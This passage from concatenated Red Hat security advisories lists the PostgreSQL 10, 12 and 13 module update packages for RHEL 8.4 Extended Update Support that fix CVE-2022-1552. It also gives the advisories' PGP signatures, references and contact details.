postgresql-upgrade-13.7-2.module+el8.4.0+15346+22c653ca.aarch64.rpm  
postgresql-upgrade-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.aarch64.rpm  
postgresql-upgrade-devel-13.7-2.module+el8.4.0+15346+22c653ca.aarch64.rpm  
postgresql-upgrade-devel-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.aarch64.rpm

noarch:  
postgresql-test-rpm-macros-13.7-2.module+el8.4.0+15346+22c653ca.noarch.rpm

ppc64le:  
pgaudit-1.5.0-1.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
pgaudit-debuginfo-1.5.0-1.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
pgaudit-debugsource-1.5.0-1.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.4.0+8873+b821c30a.ppc64le.rpm  
postgresql-13.7-2.module+el8.4.0+15346+22c653ca.ppc64le.rpm  
postgresql-contrib-13.7-2.module+el8.4.0+15346+22c653ca.ppc64le.rpm  
postgresql-contrib-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.ppc64le.rpm  
postgresql-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.ppc64le.rpm  
postgresql-debugsource-13.7-2.module+el8.4.0+15346+22c653ca.ppc64le.rpm  
postgresql-docs-13.7-2.module+el8.4.0+15346+22c653ca.ppc64le.rpm  
postgresql-docs-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.ppc64le.rpm  
postgresql-plperl-13.7-2.module+el8.4.0+15346+22c653ca.ppc64le.rpm  
postgresql-plperl-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.ppc64le.rpm  
postgresql-plpython3-13.7-2.module+el8.4.0+15346+22c653ca.ppc64le.rpm  
postgresql-plpython3-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.ppc64le.rpm  
postgresql-pltcl-13.7-2.module+el8.4.0+15346+22c653ca.ppc64le.rpm  
postgresql-pltcl-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.ppc64le.rpm  
postgresql-server-13.7-2.module+el8.4.0+15346+22c653ca.ppc64le.rpm  
postgresql-server-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.ppc64le.rpm  
postgresql-server-devel-13.7-2.module+el8.4.0+15346+22c653ca.ppc64le.rpm  
postgresql-server-devel-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.ppc64le.rpm  
postgresql-static-13.7-2.module+el8.4.0+15346+22c653ca.ppc64le.rpm  
postgresql-test-13.7-2.module+el8.4.0+15346+22c653ca.ppc64le.rpm  
postgresql-test-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.ppc64le.rpm  
postgresql-upgrade-13.7-2.module+el8.4.0+15346+22c653ca.ppc64le.rpm  
postgresql-upgrade-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.ppc64le.rpm  
postgresql-upgrade-devel-13.7-2.module+el8.4.0+15346+22c653ca.ppc64le.rpm  
postgresql-upgrade-devel-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.ppc64le.rpm

s390x:  
pgaudit-1.5.0-1.module+el8.4.0+8873+b821c30a.s390x.rpm  
pgaudit-debuginfo-1.5.0-1.module+el8.4.0+8873+b821c30a.s390x.rpm  
pgaudit-debugsource-1.5.0-1.module+el8.4.0+8873+b821c30a.s390x.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+8873+b821c30a.s390x.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.4.0+8873+b821c30a.s390x.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.4.0+8873+b821c30a.s390x.rpm  
postgresql-13.7-2.module+el8.4.0+15346+22c653ca.s390x.rpm  
postgresql-contrib-13.7-2.module+el8.4.0+15346+22c653ca.s390x.rpm  
postgresql-contrib-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.s390x.rpm  
postgresql-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.s390x.rpm  
postgresql-debugsource-13.7-2.module+el8.4.0+15346+22c653ca.s390x.rpm  
postgresql-docs-13.7-2.module+el8.4.0+15346+22c653ca.s390x.rpm  
postgresql-docs-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.s390x.rpm  
postgresql-plperl-13.7-2.module+el8.4.0+15346+22c653ca.s390x.rpm  
postgresql-plperl-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.s390x.rpm  
postgresql-plpython3-13.7-2.module+el8.4.0+15346+22c653ca.s390x.rpm  
postgresql-plpython3-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.s390x.rpm  
postgresql-pltcl-13.7-2.module+el8.4.0+15346+22c653ca.s390x.rpm  
postgresql-pltcl-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.s390x.rpm  
postgresql-server-13.7-2.module+el8.4.0+15346+22c653ca.s390x.rpm  
postgresql-server-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.s390x.rpm  
postgresql-server-devel-13.7-2.module+el8.4.0+15346+22c653ca.s390x.rpm  
postgresql-server-devel-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.s390x.rpm  
postgresql-static-13.7-2.module+el8.4.0+15346+22c653ca.s390x.rpm  
postgresql-test-13.7-2.module+el8.4.0+15346+22c653ca.s390x.rpm  
postgresql-test-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.s390x.rpm  
postgresql-upgrade-13.7-2.module+el8.4.0+15346+22c653ca.s390x.rpm  
postgresql-upgrade-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.s390x.rpm  
postgresql-upgrade-devel-13.7-2.module+el8.4.0+15346+22c653ca.s390x.rpm  
postgresql-upgrade-devel-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.s390x.rpm

x86_64:  
pgaudit-1.5.0-1.module+el8.4.0+8873+b821c30a.x86_64.rpm  
pgaudit-debuginfo-1.5.0-1.module+el8.4.0+8873+b821c30a.x86_64.rpm  
pgaudit-debugsource-1.5.0-1.module+el8.4.0+8873+b821c30a.x86_64.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+8873+b821c30a.x86_64.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.4.0+8873+b821c30a.x86_64.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.4.0+8873+b821c30a.x86_64.rpm  
postgresql-13.7-2.module+el8.4.0+15346+22c653ca.x86_64.rpm  
postgresql-contrib-13.7-2.module+el8.4.0+15346+22c653ca.x86_64.rpm  
postgresql-contrib-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.x86_64.rpm  
postgresql-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.x86_64.rpm  
postgresql-debugsource-13.7-2.module+el8.4.0+15346+22c653ca.x86_64.rpm  
postgresql-docs-13.7-2.module+el8.4.0+15346+22c653ca.x86_64.rpm  
postgresql-docs-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.x86_64.rpm  
postgresql-plperl-13.7-2.module+el8.4.0+15346+22c653ca.x86_64.rpm  
postgresql-plperl-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.x86_64.rpm  
postgresql-plpython3-13.7-2.module+el8.4.0+15346+22c653ca.x86_64.rpm  
postgresql-plpython3-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.x86_64.rpm  
postgresql-pltcl-13.7-2.module+el8.4.0+15346+22c653ca.x86_64.rpm  
postgresql-pltcl-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.x86_64.rpm  
postgresql-server-13.7-2.module+el8.4.0+15346+22c653ca.x86_64.rpm  
postgresql-server-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.x86_64.rpm  
postgresql-server-devel-13.7-2.module+el8.4.0+15346+22c653ca.x86_64.rpm  
postgresql-server-devel-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.x86_64.rpm  
postgresql-static-13.7-2.module+el8.4.0+15346+22c653ca.x86_64.rpm  
postgresql-test-13.7-2.module+el8.4.0+15346+22c653ca.x86_64.rpm  
postgresql-test-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.x86_64.rpm  
postgresql-upgrade-13.7-2.module+el8.4.0+15346+22c653ca.x86_64.rpm  
postgresql-upgrade-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.x86_64.rpm  
postgresql-upgrade-devel-13.7-2.module+el8.4.0+15346+22c653ca.x86_64.rpm  
postgresql-upgrade-devel-debuginfo-13.7-2.module+el8.4.0+15346+22c653ca.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1552  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYpgdvNzjgjWX9erEAQiPMQ//W6xy9WHzkkfQeNaFJ/TMzpUS5ws/MFKa  
8xwMl0D9lA1cauCGQso/AB+ei2jFlWr0DtjQ4Br5CRIx2TGLq7Q3vzjoyCxx/1rw  
uET6p/5EwtTDa4OTJagTZWPlmYwwX8ZO8AQc0SDrzzXHSlZ+N1MviOHRnjZmSJvo  
J+KB0NYEAuTVSiZaHk3+aUN8mP6ImPa3IxoGGwuecBNewDqB73mdYbR6K+mJdOvK  
Qf7PfiTVaPIZ0QvAR+S7enouX4q8GchlqAeAwt336hWQNs7WkOAtZPNhg0Z2vwln  
IT2mwyUYPvGZJqMnFP19WHJaCri/aQKVFe6gwd8qQY6mNXKbaEdTwSyHxpaEhF0m  
NJKU3vA+GsYJ4clr7cJjQyBZ/qLTD3ZjGYPppt/+h1C8xHiABsuYpSO6XdBTerQQ  
jKA8A0UQ7GzlMasaNnNPvIj6xzHmCXVSLiiOC/nCzok+qQw6XE+8vvwM3/m+eBuf  
t71z5tIz/EU0QYNjYDi37ePl3wpfiaOnTj5LeGMAsdspcu4mvx/VKl20mwVwBJ37  
z1MPnaZBaA0FqsVAmy0+ln0M5DzXGZTRv4SPIaFk0SQWu2k+L0avmLwcyqE3vW4u  
1kzwigWieAJZQfULydxsDcLbqQd28adAU6Yttjz3xy3N9OftA/S82zMtARqs1kdy  
TNjwXxXo7EA=LmL9  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-4857-01

Red Hat Security Advisory 2022-4854-01 - PostgreSQL is an advanced object-relational database management system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: postgresql:10 security update  
Advisory ID:       RHSA-2022:4854-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:4854  
Issue date:        2022-06-01  
CVE Names:         CVE-2022-1552  
====================================================================  
1. Summary:

An update for the postgresql:10 module is now available for Red Hat  
Enterprise Linux 8.4 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

PostgreSQL is an advanced object-relational database management system  
(DBMS).

The following packages have been upgraded to a later upstream version:  
postgresql (10.21).

Security Fix(es):

* postgresql: Autovacuum, REINDEX, and others omit "security restricted  
operation" sandbox (CVE-2022-1552)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

If the postgresql service is running, it will be automatically restarted  
after installing this update.

5. Bugs fixed (https://bugzilla.redhat.com/):

2081126 - CVE-2022-1552 postgresql: Autovacuum, REINDEX, and others omit "security restricted operation" sandbox

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.4):

Source:  
postgresql-10.21-2.module+el8.4.0+15341+25c9f2fe.src.rpm

aarch64:  
postgresql-10.21-2.module+el8.4.0+15341+25c9f2fe.aarch64.rpm  
postgresql-contrib-10.21-2.module+el8.4.0+15341+25c9f2fe.aarch64.rpm  
postgresql-contrib-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.aarch64.rpm  
postgresql-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.aarch64.rpm  
postgresql-debugsource-10.21-2.module+el8.4.0+15341+25c9f2fe.aarch64.rpm  
postgresql-docs-10.21-2.module+el8.4.0+15341+25c9f2fe.aarch64.rpm  
postgresql-docs-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.aarch64.rpm  
postgresql-plperl-10.21-2.module+el8.4.0+15341+25c9f2fe.aarch64.rpm  
postgresql-plperl-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.aarch64.rpm  
postgresql-plpython3-10.21-2.module+el8.4.0+15341+25c9f2fe.aarch64.rpm  
postgresql-plpython3-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.aarch64.rpm  
postgresql-pltcl-10.21-2.module+el8.4.0+15341+25c9f2fe.aarch64.rpm  
postgresql-pltcl-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.aarch64.rpm  
postgresql-server-10.21-2.module+el8.4.0+15341+25c9f2fe.aarch64.rpm  
postgresql-server-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.aarch64.rpm  
postgresql-server-devel-10.21-2.module+el8.4.0+15341+25c9f2fe.aarch64.rpm  
postgresql-server-devel-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.aarch64.rpm  
postgresql-static-10.21-2.module+el8.4.0+15341+25c9f2fe.aarch64.rpm  
postgresql-test-10.21-2.module+el8.4.0+15341+25c9f2fe.aarch64.rpm  
postgresql-test-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.aarch64.rpm  
postgresql-test-rpm-macros-10.21-2.module+el8.4.0+15341+25c9f2fe.aarch64.rpm  
postgresql-upgrade-10.21-2.module+el8.4.0+15341+25c9f2fe.aarch64.rpm  
postgresql-upgrade-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.aarch64.rpm  
postgresql-upgrade-devel-10.21-2.module+el8.4.0+15341+25c9f2fe.aarch64.rpm  
postgresql-upgrade-devel-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.aarch64.rpm

ppc64le:  
postgresql-10.21-2.module+el8.4.0+15341+25c9f2fe.ppc64le.rpm  
postgresql-contrib-10.21-2.module+el8.4.0+15341+25c9f2fe.ppc64le.rpm  
postgresql-contrib-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.ppc64le.rpm  
postgresql-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.ppc64le.rpm  
postgresql-debugsource-10.21-2.module+el8.4.0+15341+25c9f2fe.ppc64le.rpm  
postgresql-docs-10.21-2.module+el8.4.0+15341+25c9f2fe.ppc64le.rpm  
postgresql-docs-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.ppc64le.rpm  
postgresql-plperl-10.21-2.module+el8.4.0+15341+25c9f2fe.ppc64le.rpm  
postgresql-plperl-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.ppc64le.rpm  
postgresql-plpython3-10.21-2.module+el8.4.0+15341+25c9f2fe.ppc64le.rpm  
postgresql-plpython3-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.ppc64le.rpm  
postgresql-pltcl-10.21-2.module+el8.4.0+15341+25c9f2fe.ppc64le.rpm  
postgresql-pltcl-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.ppc64le.rpm  
postgresql-server-10.21-2.module+el8.4.0+15341+25c9f2fe.ppc64le.rpm  
postgresql-server-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.ppc64le.rpm  
postgresql-server-devel-10.21-2.module+el8.4.0+15341+25c9f2fe.ppc64le.rpm  
postgresql-server-devel-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.ppc64le.rpm  
postgresql-static-10.21-2.module+el8.4.0+15341+25c9f2fe.ppc64le.rpm  
postgresql-test-10.21-2.module+el8.4.0+15341+25c9f2fe.ppc64le.rpm  
postgresql-test-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.ppc64le.rpm  
postgresql-test-rpm-macros-10.21-2.module+el8.4.0+15341+25c9f2fe.ppc64le.rpm  
postgresql-upgrade-10.21-2.module+el8.4.0+15341+25c9f2fe.ppc64le.rpm  
postgresql-upgrade-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.ppc64le.rpm  
postgresql-upgrade-devel-10.21-2.module+el8.4.0+15341+25c9f2fe.ppc64le.rpm  
postgresql-upgrade-devel-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.ppc64le.rpm

s390x:  
postgresql-10.21-2.module+el8.4.0+15341+25c9f2fe.s390x.rpm  
postgresql-contrib-10.21-2.module+el8.4.0+15341+25c9f2fe.s390x.rpm  
postgresql-contrib-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.s390x.rpm  
postgresql-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.s390x.rpm  
postgresql-debugsource-10.21-2.module+el8.4.0+15341+25c9f2fe.s390x.rpm  
postgresql-docs-10.21-2.module+el8.4.0+15341+25c9f2fe.s390x.rpm  
postgresql-docs-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.s390x.rpm  
postgresql-plperl-10.21-2.module+el8.4.0+15341+25c9f2fe.s390x.rpm  
postgresql-plperl-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.s390x.rpm  
postgresql-plpython3-10.21-2.module+el8.4.0+15341+25c9f2fe.s390x.rpm  
postgresql-plpython3-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.s390x.rpm  
postgresql-pltcl-10.21-2.module+el8.4.0+15341+25c9f2fe.s390x.rpm  
postgresql-pltcl-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.s390x.rpm  
postgresql-server-10.21-2.module+el8.4.0+15341+25c9f2fe.s390x.rpm  
postgresql-server-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.s390x.rpm  
postgresql-server-devel-10.21-2.module+el8.4.0+15341+25c9f2fe.s390x.rpm  
postgresql-server-devel-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.s390x.rpm  
postgresql-static-10.21-2.module+el8.4.0+15341+25c9f2fe.s390x.rpm  
postgresql-test-10.21-2.module+el8.4.0+15341+25c9f2fe.s390x.rpm  
postgresql-test-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.s390x.rpm  
postgresql-test-rpm-macros-10.21-2.module+el8.4.0+15341+25c9f2fe.s390x.rpm  
postgresql-upgrade-10.21-2.module+el8.4.0+15341+25c9f2fe.s390x.rpm  
postgresql-upgrade-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.s390x.rpm  
postgresql-upgrade-devel-10.21-2.module+el8.4.0+15341+25c9f2fe.s390x.rpm  
postgresql-upgrade-devel-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.s390x.rpm

x86_64:  
postgresql-10.21-2.module+el8.4.0+15341+25c9f2fe.x86_64.rpm  
postgresql-contrib-10.21-2.module+el8.4.0+15341+25c9f2fe.x86_64.rpm  
postgresql-contrib-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.x86_64.rpm  
postgresql-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.x86_64.rpm  
postgresql-debugsource-10.21-2.module+el8.4.0+15341+25c9f2fe.x86_64.rpm  
postgresql-docs-10.21-2.module+el8.4.0+15341+25c9f2fe.x86_64.rpm  
postgresql-docs-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.x86_64.rpm  
postgresql-plperl-10.21-2.module+el8.4.0+15341+25c9f2fe.x86_64.rpm  
postgresql-plperl-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.x86_64.rpm  
postgresql-plpython3-10.21-2.module+el8.4.0+15341+25c9f2fe.x86_64.rpm  
postgresql-plpython3-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.x86_64.rpm  
postgresql-pltcl-10.21-2.module+el8.4.0+15341+25c9f2fe.x86_64.rpm  
postgresql-pltcl-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.x86_64.rpm  
postgresql-server-10.21-2.module+el8.4.0+15341+25c9f2fe.x86_64.rpm  
postgresql-server-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.x86_64.rpm  
postgresql-server-devel-10.21-2.module+el8.4.0+15341+25c9f2fe.x86_64.rpm  
postgresql-server-devel-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.x86_64.rpm  
postgresql-static-10.21-2.module+el8.4.0+15341+25c9f2fe.x86_64.rpm  
postgresql-test-10.21-2.module+el8.4.0+15341+25c9f2fe.x86_64.rpm  
postgresql-test-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.x86_64.rpm  
postgresql-test-rpm-macros-10.21-2.module+el8.4.0+15341+25c9f2fe.x86_64.rpm  
postgresql-upgrade-10.21-2.module+el8.4.0+15341+25c9f2fe.x86_64.rpm  
postgresql-upgrade-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.x86_64.rpm  
postgresql-upgrade-devel-10.21-2.module+el8.4.0+15341+25c9f2fe.x86_64.rpm  
postgresql-upgrade-devel-debuginfo-10.21-2.module+el8.4.0+15341+25c9f2fe.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1552  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYpgdsNzjgjWX9erEAQj9vw/+M74nNXg+gDraQPuEeoAGn13j5vtAwWDC  
bnvUWa43XC7EBP3qXbR21xAbz+IntQ5YYllGXcFrmimbqlZAmhPHea5dGI8z2GaI  
tbq+/4YI4G47PicU5D2Qrtd2HzDqAJgOk8MG/8LeG5kjQxegBnW1eNqmuV1+jWfM  
V6ikG1z8SODuImgiLQxe/Q6uesLVP4SbzJ6lIs0ya9e+C/IJsgTf/1No77QQYSNO  
K8hDJY6+KWnzz0ZTjCfVMHOJ7PcDGM+yk42lDkv5xVRLBLJgSRU3Xrsyn3oB/MAp  
Ui5j0P1FhF0Btqd+20BIEET9TEaqD3hcdVsN/cYUueoURFsUKFFDGFZQ1X3j9HdX  
+VMYOnYDFiN09SMXK+CRtBJVS/wnm1+2F46WLRC3N3HoomhgU/AgTCmZrD7CDMfh  
waQNJKhItKG4RA086AkG7Rwq+QODXSGms1jUyMGi1dNdme/dWE8tsfO0jjmNZ3oZ  
bPyymNJRJK9VgXbGNJsrgWZZa8mst9uLV9AXcD1drG6Qj1GQogApYzvc31xN3K3G  
IvIww1LnM89WB/SQ43al9VtLlXbIqBSZG0DYGnobFTc6VC5BvPIZnm/OeAewP0p7  
GCTWGpGFnd8yL6+Y+rYsoyJxlFQnwl6YiUx72vmstqKfre95UPxXNeIALtKbFijV  
t4qNNY5hl+8=0kZx  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-4854-01

Red Hat Security Advisory 2022-4856-01 - PostgreSQL is an advanced object-relational database management system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: postgresql:12 security update  
Advisory ID:       RHSA-2022:4856-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:4856  
Issue date:        2022-06-01  
CVE Names:         CVE-2022-1552  
====================================================================  
1. Summary:

An update for the postgresql:12 module is now available for Red Hat  
Enterprise Linux 8.4 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.4) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

PostgreSQL is an advanced object-relational database management system  
(DBMS).

The following packages have been upgraded to a later upstream version:  
postgresql (12.11).

Security Fix(es):

* postgresql: Autovacuum, REINDEX, and others omit "security restricted  
operation" sandbox (CVE-2022-1552)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

If the postgresql service is running, it will be automatically restarted  
after installing this update.

5. Bugs fixed (https://bugzilla.redhat.com/):

2081126 - CVE-2022-1552 postgresql: Autovacuum, REINDEX, and others omit "security restricted operation" sandbox

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.4):

Source:  
pgaudit-1.4.0-6.module+el8.4.0+11288+c193d6d7.src.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+11288+c193d6d7.src.rpm  
postgresql-12.11-2.module+el8.4.0+15406+aeb4ae67.src.rpm

aarch64:  
pgaudit-1.4.0-6.module+el8.4.0+11288+c193d6d7.aarch64.rpm  
pgaudit-debuginfo-1.4.0-6.module+el8.4.0+11288+c193d6d7.aarch64.rpm  
pgaudit-debugsource-1.4.0-6.module+el8.4.0+11288+c193d6d7.aarch64.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+11288+c193d6d7.aarch64.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.4.0+11288+c193d6d7.aarch64.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.4.0+11288+c193d6d7.aarch64.rpm  
postgresql-12.11-2.module+el8.4.0+15406+aeb4ae67.aarch64.rpm  
postgresql-contrib-12.11-2.module+el8.4.0+15406+aeb4ae67.aarch64.rpm  
postgresql-contrib-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.aarch64.rpm  
postgresql-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.aarch64.rpm  
postgresql-debugsource-12.11-2.module+el8.4.0+15406+aeb4ae67.aarch64.rpm  
postgresql-docs-12.11-2.module+el8.4.0+15406+aeb4ae67.aarch64.rpm  
postgresql-docs-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.aarch64.rpm  
postgresql-plperl-12.11-2.module+el8.4.0+15406+aeb4ae67.aarch64.rpm  
postgresql-plperl-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.aarch64.rpm  
postgresql-plpython3-12.11-2.module+el8.4.0+15406+aeb4ae67.aarch64.rpm  
postgresql-plpython3-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.aarch64.rpm  
postgresql-pltcl-12.11-2.module+el8.4.0+15406+aeb4ae67.aarch64.rpm  
postgresql-pltcl-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.aarch64.rpm  
postgresql-server-12.11-2.module+el8.4.0+15406+aeb4ae67.aarch64.rpm  
postgresql-server-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.aarch64.rpm  
postgresql-server-devel-12.11-2.module+el8.4.0+15406+aeb4ae67.aarch64.rpm  
postgresql-server-devel-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.aarch64.rpm  
postgresql-static-12.11-2.module+el8.4.0+15406+aeb4ae67.aarch64.rpm  
postgresql-test-12.11-2.module+el8.4.0+15406+aeb4ae67.aarch64.rpm  
postgresql-test-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.aarch64.rpm  
postgresql-upgrade-12.11-2.module+el8.4.0+15406+aeb4ae67.aarch64.rpm  
postgresql-upgrade-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.aarch64.rpm  
postgresql-upgrade-devel-12.11-2.module+el8.4.0+15406+aeb4ae67.aarch64.rpm  
postgresql-upgrade-devel-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.aarch64.rpm

noarch:  
postgresql-test-rpm-macros-12.11-2.module+el8.4.0+15406+aeb4ae67.noarch.rpm

ppc64le:  
pgaudit-1.4.0-6.module+el8.4.0+11288+c193d6d7.ppc64le.rpm  
pgaudit-debuginfo-1.4.0-6.module+el8.4.0+11288+c193d6d7.ppc64le.rpm  
pgaudit-debugsource-1.4.0-6.module+el8.4.0+11288+c193d6d7.ppc64le.rpm  
postgres-decoderbufs-0.10.0-2.module+el8.4.0+11288+c193d6d7.ppc64le.rpm  
postgres-decoderbufs-debuginfo-0.10.0-2.module+el8.4.0+11288+c193d6d7.ppc64le.rpm  
postgres-decoderbufs-debugsource-0.10.0-2.module+el8.4.0+11288+c193d6d7.ppc64le.rpm  
postgresql-12.11-2.module+el8.4.0+15406+aeb4ae67.ppc64le.rpm  
postgresql-contrib-12.11-2.module+el8.4.0+15406+aeb4ae67.ppc64le.rpm  
postgresql-contrib-debuginfo-12.11-2.module+el8.4.0+15406+aeb4ae67.ppc64le.rpm  
